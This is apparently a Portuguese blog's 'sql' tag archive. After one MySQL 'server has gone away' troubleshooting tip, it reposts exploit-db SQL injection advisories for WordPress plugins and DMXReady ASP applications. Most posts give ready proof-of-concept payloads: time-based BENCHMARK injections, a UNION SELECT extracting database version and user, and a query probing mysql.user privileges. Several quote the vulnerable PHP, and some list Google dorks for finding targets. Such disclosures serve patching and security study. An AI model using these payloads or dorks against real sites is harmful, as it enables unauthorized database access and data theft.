Browsed by
Tag: sql

MySQL server has gone away

MySQL server has gone away

Seu mysql anda estranho quando você está tentando fazer upload de um arquivo enorme via console (na verdade o restore, ou seja, mysql -u usuario -p nomedobdprarestaurar < arquivo.sql)??? Bem, se a mensagem de erro for esta -> MySQL server has gone away NÃO precisa entrar em pânico, só existem 2 coisas que são feitas e sanam tranquilamente o erro: 1 – entre no /etc/my.cnf (ou arquivo de configuração do mysql) e informe set-variable = max_connections=1500 Isto vai liberar para 1500 conexões…

Read More Read More

WordPress jetpack plugin SQL Injection Vulnerability

WordPress jetpack plugin SQL Injection Vulnerability

###################################################### # Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability # Date: 2011-19-11 # Author: longrifle0x # software: WordPress # Download:http://wordpress.org/extend/plugins/jetpack/ # Tools: SQLMAP ###################################################### *DESCRIPTION Discovered a vulnerability in  jetpack, WordPress Plugin, vulnerability is SQL injection. File:wp-content/plugins/jetpack/modules/sharedaddy.php Exploit: id=-1; or 1=if *Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user=’None’ LIMIT 0,1)=’Y’) THEN 1 ELSE 0 END) http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][MID((VERSION()),1,6)   Fonte: http://www.exploit-db.com/exploits/18126/

WordPress PureHTML plugin <= 1.0.0 SQL Injection

WordPress PureHTML plugin <= 1.0.0 SQL Injection

# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off ————— PoC (POST data) ————— http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1′ AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— if(!isset($_POST[‘PureHTMLNOnce’])){ if ( !dbunixwp_verify_nonce( $_POST[‘PureHTMLNOnce’], plugin_basename(__FILE__) )) {header(“location:”.$refer);} } else{ … if(isset($_POST[‘id’])){$id = $_POST[‘id’];}else{$id=’0′;} … $action = $_POST[‘action’]; #delete if($action == “delete”){ $sql = “delete from “.$wpdb->prefix.”pureHTML_functions WHERE id=’”.$id.”‘”; $wpdb->query($wpdb->prepare($sql));…

Read More Read More

WordPress yolink Search plugin <= 1.1.4 SQL Injection

WordPress yolink Search plugin <= 1.1.4 SQL Injection

# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] = '"page"'; } if( isset( $_POST['post'] ) ) { $post_type_in[] = '"post"'; } $post_type_in = '(' . implode(',', $post_type_in) . ')'; $id_from = $_POST['from_id']; $batch_size...

Read More Read More

WordPress Event Registration plugin <= 5.4.3 SQL Injection

WordPress Event Registration plugin <= 5.4.3 SQL Injection

# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $id= $_REQUEST[‘id’]; … $sql = “SELECT * FROM ” . $events_detail_tbl . ” WHERE id=’$id'”; $result = mysql_query($sql); Fonte: http://www.exploit-db.com/exploits/17751/

WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability

WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability

# Exploit Title: WordPress Contus HD FLV Player plugin < = 1.3 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.zip # Version: 1.3 (tested) --- PoC --- http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1 ————— Vulnerable code ————— $pid1 = $_GET[‘playid’]; foreach ($_GET[‘listItem’] as $position => $item) : mysql_query(“UPDATE $wpdb->prefix” . “hdflv_med2play SET sorder = $position WHERE media_id = $item and playlist_id=$pid1 “); endforeach; Fonte: http://www.exploit-db.com/exploits/17678/

WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability

WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability

# Exploit Title: WordPress File Groups plugin < = 1.1.2 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip # Version: 1.1.2 (tested) --- PoC --- http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121))) --------------- Vulnerable code --------------- $fgid = $_GET['fgid']; ... $file_list = $wpdb->get_col(“select guid from dbunixwp_posts where post_parent = $fgid”); http://www.exploit-db.com/exploits/17677/

WP E-commerce plugin <= 3.8.4 SQL Injection Exploit

WP E-commerce plugin <= 3.8.4 SQL Injection Exploit

# Exploit Title: WP E-commerce plugin < = 3.8.4 Sql Injection # Google Dork: inurl:page_id= “Your billing/contact details” # Date: 18/07/2011 # Author: IHTeam # Software Link: http://www.getshopped.org/ # Version: 3.8.4 # Tested on: 3.8.4 # Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Document Library Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_documentlibrarymanager.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=document-library-manager # Version: v1.2 #Language: ASP # Price : $99.97 # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members…. —————————————————————————————————- Bug; http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ SQL ATTACK] Fonte: http://www.exploit-db.com/exploits/17482/

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DMXReady Account List Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_billboardmanager_summary_popup.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=account-list-manager # Version: v1.2 #Language: ASP # Price : $99.97 #Demo : http://demo.dmxready.com/applications/AccountListManager/inc_accountlistmanager.asp # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members…. ————————————————————————————————— Bug; http://target/path/admin/AccountListManager/update.asp?AccountID=xx [ SQL ATTACK] Fonte: http://www.exploit-db.com/exploits/17483/